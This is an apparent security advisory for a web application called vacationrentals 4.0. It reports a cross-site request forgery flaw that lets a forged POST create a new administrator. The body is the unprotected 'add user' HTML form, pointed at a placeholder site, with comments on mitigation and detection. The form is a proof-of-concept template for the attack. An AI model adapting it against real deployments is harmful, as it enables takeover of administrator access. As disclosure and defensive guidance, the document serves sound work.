< ------------------- header data start ------------------- >

#############################################################

# Application Name : vacationrentals

# Version : 4.0

# Vulnerability Type : XSRF (cross-site request forgery, CSRF)

# Impact : A new admin can be added.

# Bug Fix Advice : A session key (session token) should be added to the form and checked by the server when the form is submitted.

# author : CWH1RLPOOL ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<!--
  Listing from the advisory: a copy of the application's admin "add user" form.
  The action targets [path]/admin/users/add with method POST and
  enctype multipart/form-data.
  None of the inputs below is an anti-CSRF token. That is the defect the
  advisory reports: the request carries nothing that ties it to a form the
  application itself served to the logged-in administrator.
  NOTE(review): presumably the endpoint authorises the request from the
  admin session cookie alone; confirm against the server-side handler.
  Mitigation: issue an unpredictable per-session (or per-request) token in a
  hidden field and reject the POST when it is missing or does not match;
  set SameSite on the session cookie; check Origin/Referer on state-changing
  requests; consider re-authentication before creating privileged accounts.
  Detection: alert on POSTs to this path whose Origin or Referer is not the
  application's own host, and audit every newly created admin account.
  NOTE(review): attribute values are unquoted and the form id holds a
  URL-like string; quoting was presumably lost when the page was extracted.
  The lines are kept verbatim.
-->
<form id=http://www.site.com/[path]/admin/users_add method=post action=http://www.site.com/[path]/admin/users/add enctype=multipart/form-data>
<input type=hidden name=profile_logo id=profile_logo value= />
<!-- Fields of the account being created: user_name, email, password and retype_password. -->
<input class=text type=text id=user_name name=user_name value= />
<input class=text type=text id=email name=email value= />
<input class=text type=password id=password name=password />
<input class=text type=password id=retype_password name=retype_password />
<!-- Profile fields: full name, two phone numbers, fax, spoken languages, web address. -->
<input class=text type=text id=profile_full_name name=profile_full_name value= />
<input class=text type=text id=profile_phone1 name=profile_phone1 value= />
<input class=text type=text id=profile_phone2 name=profile_phone2 value= />
<input class=text type=text id=profile_fax name=profile_fax value= />
<input class=text type=text id=profile_spoken_languages name=profile_spoken_languages value= />
<input class=text type=text id=profile_web_address name=profile_web_address value= />
<!-- File upload field; presumably the reason the form uses multipart/form-data. -->
<input type=file id=profile_logo_upload name=profile_logo_upload />
<!-- Submit control. A fixed form carries a hidden token input next to these fields, validated on the server. -->
<input class=btn-orange type=submit value=Add user id=submit name=submit /><div class=btn-orange-end> </div>
</form>
< -- bug code end of -- >